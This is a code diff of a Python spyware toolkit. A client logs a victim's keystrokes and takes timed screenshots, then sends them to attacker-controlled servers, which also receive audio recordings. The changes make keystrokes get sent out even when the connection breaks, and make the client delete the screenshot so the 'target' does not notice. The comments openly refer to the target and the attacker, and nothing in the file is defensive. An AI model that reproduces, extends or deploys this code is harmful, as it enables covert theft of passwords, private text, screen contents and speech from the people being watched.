@@ -55,7 +55,7 @@ def client(ip_photos, port_photos):
     # This connects to the server you specified
     image = pg.screenshot()
     # "image" screenshots the current image after a specific time
-    fotoname = f"Image.png"
+    fotoname = "Image.png"
     # Name of the image
     image.save(fotoname)
     # Saves the image in the current directory
@@ -69,41 +69,56 @@ def client(ip_photos, port_photos):
 
     s.send(full_msg)
 
-
 def countdown_send(zeit, ip_photos, port_photos, ip_keylogger, port_keylogger):
     seconds_list = [zahl for zahl in range(0, zeit + 1, 60) if zahl != 0]
     # The seconds the image will be sent in 60 steps to the server will be saved in "seconds_list"
     seconds_list = seconds_list + [20, 40]
     # The image will always be sent at the 20th and the 40th second so if the client suddenly dies some data will still be sent
     print(seconds_list)
-    for x in range(zeit + 1):
-        print(x)
-        zeit -= 1
-        time.sleep(1)
-        if x in seconds_list:
-            client(ip_photos, port_photos)
-            # The images will be sent
-
     key_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-    key_data.connect((ip_keylogger, port_keylogger))
-    # This is the ip and the port of the server the port shouldn't be the same the server_photos and the server_keylogger shouldn't be
-    # in the same folder
+    try:
+        for x in range(zeit + 1):
+            print(x)
+            zeit -= 1
+            time.sleep(1)
+            if x in seconds_list:
+                client(ip_photos, port_photos)
+                # The images will be sent
+        key_data.connect((ip_keylogger, port_keylogger))
+        # This is the ip and the port of the server the port shouldn't be the same the server_photos and the server_keylogger shouldn't be
+        # in the same folder
 
-    wort = ""
-    for zeichen in richtige_liste:
-        wort += zeichen
+        wort = ""
+        for zeichen in richtige_liste:
+            wort += zeichen
 
-    # Sends the data to server_keylogger
-    key_data.send(wort.encode())
-    print(wort)
-    print(richtige_liste)
-    fhandle.close()
-    # Closes the image
-    os.remove("Image.png")
-    # Deletes the image in the current directory
-    sys.exit()
-    # Stops the keylogger
+        # Sends the data to server_keylogger
+        key_data.send(wort.encode())
+        print(wort)
+        print(richtige_liste)
+        fhandle.close()
+        # Closes the image
+        os.remove("Image.png")
+        # Deletes the image in the current directory
+        sys.exit()
+        # Stops the keylogger
+    except KeyboardInterrupt:
+        #If the target has destroyed the connection
+        wort = "***%§§)§§%"
+        #This is like a special code. To split it at the end
+        for zeichen in richtige_liste:
+            wort += zeichen
+        data = f"THE CONNECTION HAS BEEN INTERRUPTED{wort}"
+        #This let's the server know that the server is should shutdown
+        key_data.connect((ip_keylogger, port_keylogger))
+        key_data.send(data.encode())
+        key_data.close()
 
+        if os.path.exists("Image.png"):
+            #It will destroy the image so target wound know anything
+            fhandle.close()
+            os.remove("Image.png")
+            #This removes the image
 
 richtige_liste = []
 
@@ -123,7 +138,6 @@ def on_press(key):
             # If the target presses tab or space a "{" will be appended to the list so the attacker knows when and
             # space or a tab key has been pressed
 
-
 def on_release(key):
     print(f'Key released: {key}')
 
@@ -166,6 +180,7 @@ class KeyloggerTarget:
             with keyboard.Listener(on_press=on_press, on_release=on_release) as listener:
                 countdown_send(self.duration, self.ip_photos, self.port_photos, self.ip_keylogger, self.port_keylogger)
                 listener.join()
+
                 # This listens to the keys that where typed
 
 
@@ -184,28 +199,54 @@ class ServerKeylogger:
             bp.color("Waiting for connection....", "magenta")
             clientsocket, ipaddress = server.accept()
             # Data is in clientsocket and the ip-address is obviously in "ipaddress"
-            bp.color(f"Connection has been established with {ipaddress}", "magenta")
+            bp.color(f"\nConnection has been established with {ipaddress}", "magenta")
 
             full_msg = ""
             while True:
-                msg = clientsocket.recv(200).decode()
-
+                msg = clientsocket.recv(2000).decode()
+                #More Data can be accepted due to a bigger buffer size
                 if len(msg) <= 0: break
                 full_msg += msg
 
-            for zeichen in full_msg:
-                if "{" == zeichen:
-                    # "{" this detects if a space or a tab is in full_msg
-                    full_msg = full_msg.replace("{", " ")
-            # The data is being stored in full_msg
-            bp.color(f"Text of target: {full_msg}", "magenta")
-            zeit = time.strftime("%H-%M-%S-%Y")
-            # This is the time the data has arrived
-            if full_msg != "":
-                with open(f"Keylogger of the target Time {zeit}.txt", "a+", encoding="utf-8") as file:
-                    file.write(f"Here is everything the target was typing \n\n{full_msg}")
+            if "THE CONNECTION HAS BEEN INTERRUPTED" not in full_msg:
+                #To know if the server has some issues
+                for zeichen in full_msg:
+                    if "{" == zeichen:
+                        # "{" this detects if a space or a tab is in full_msg
+                        full_msg = full_msg.replace("{", " ")
 
-            else: bp.color("The Target didn't type something...", "magenta")
+                # The data is being stored in full_msg
+                bp.color(f"Text of target: {full_msg}", "magenta")
+                zeit = time.strftime("%H-%M-%S-%Y")
+                # This is the time the data has arrived
+                if full_msg != "":
+                    with open(f"Keylogger of the target Time {zeit}.txt", "a+", encoding="utf-8") as file:
+                        file.write(f"HERE IS EVERYTHING THE TARGET HAS TYPED \n\n{full_msg}")
+
+                else:
+                    bp.color("The Target didn't type something...", "magenta")
+
+            else:
+                spalten = full_msg.split("***%§§)§§%")
+                #This splits the data with the special code
+                if spalten[1] != "":
+                    #If the data is not empty
+                    text = spalten[1]
+                    for zeichen in text:
+                        if "{" == zeichen:
+                            text = text.replace("{", " ")
+                    bp.color(f"Text of target: {text}", "magenta")
+                    zeit = time.strftime("%H-%M-%S-%Y")
+                    # This is the time the data has arrived
+                    with open(f"Keylogger of the target Time {zeit}.txt", "a+", encoding="utf-8") as file:
+                        file.write(f"HERE IS EVERYTHING THE TARGET HAS TYPED \n\n{text}")
+                        #That means data will appear even if the connection isn't stabled
+                else: bp.color("The target hasn't written something in the meanwhile", "magenta")
+
+                bp.color("\nTHE CONNECTION HAS BEEN INTERRUPTED", "magenta")
+                bp.color("THE SERVER WILL BE DESTROYED\n", "magenta")
+                os._exit(0)
+                #This shuts down the server
 
         except OSError:
             raise OSError("Change the port number to run without an error")
@@ -220,8 +261,7 @@ class ServerPhotos:
         bp.color("Cyan: ServerPhotos", "cyan")
         bp.color("Blue: ServerKeylogger", "magenta")
         bp.color("Green: ServerListener", "green")
-        print("White: Timer")
-        print("\n")
+        print("White: Timer\n")
         try:
             server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
             server.bind((self.ip, self.port))
@@ -251,6 +291,7 @@ class ServerPhotos:
                 else: bp.color(f"{anzahl} Image have been saved to your working directory", "cyan")
                 #Detetcts how many Image have been saved to your directory
 
+
         except OSError:
             raise OSError("Change the port number to run without an error")
 
@@ -260,12 +301,12 @@ class ServerListener:
         self.port = port
 
     def start(self):
+        global urgent
         try:
             listening_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
             listening_data.bind((self.ip, self.port))
             listening_data.listen(5)
-            # 5 possible connection
-
+            # 5 possible connections
             bp.color("Waiting for connection...", "green")
             # Waits for a connection
 
@@ -274,8 +315,8 @@ class ServerListener:
             check = 0
             full_msg = ""
             while True:
-                msg = client_socket.recv(3000000).decode()
-                # The buffersize is 30000000 because there is a lot of data in audio files
+                msg = client_socket.recv(30000000).decode()
+                # The buffersize is 300000000 because there is a lot of data in audio files
                 if len(msg) <= 0: break
                 full_msg += msg
 
@@ -290,6 +331,7 @@ class ServerListener:
             bp.color('"Audio of target.wav" has been saved to your directory', "green")
 
             #This stores everything the target was talking
+
         except OSError:
             raise OSError("Change the port number to run without an error")
 
@@ -312,12 +354,10 @@ class Timer:
             time.sleep(1)
             seconds -= 1
 
-        if minutes == 0:
-            print(f"\nSuccessful connection for {exact_seconds} seconds")
-        elif exact_seconds == 0:
-            print(f"\nSuccessful connection for {minutes} minutes")
-        else:
-            print(f"\nSuccessful connection for {minutes} minutes and {exact_seconds} seconds")
+
+        if minutes == 0: print(f"\nSuccessful connection for {exact_seconds} seconds")
+        elif exact_seconds == 0: print(f"\nSuccessful connection for {minutes} minutes")
+        else: print(f"\nSuccessful connection for {minutes} minutes and {exact_seconds} seconds")
 
     def start_timer(self):
         show_time = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
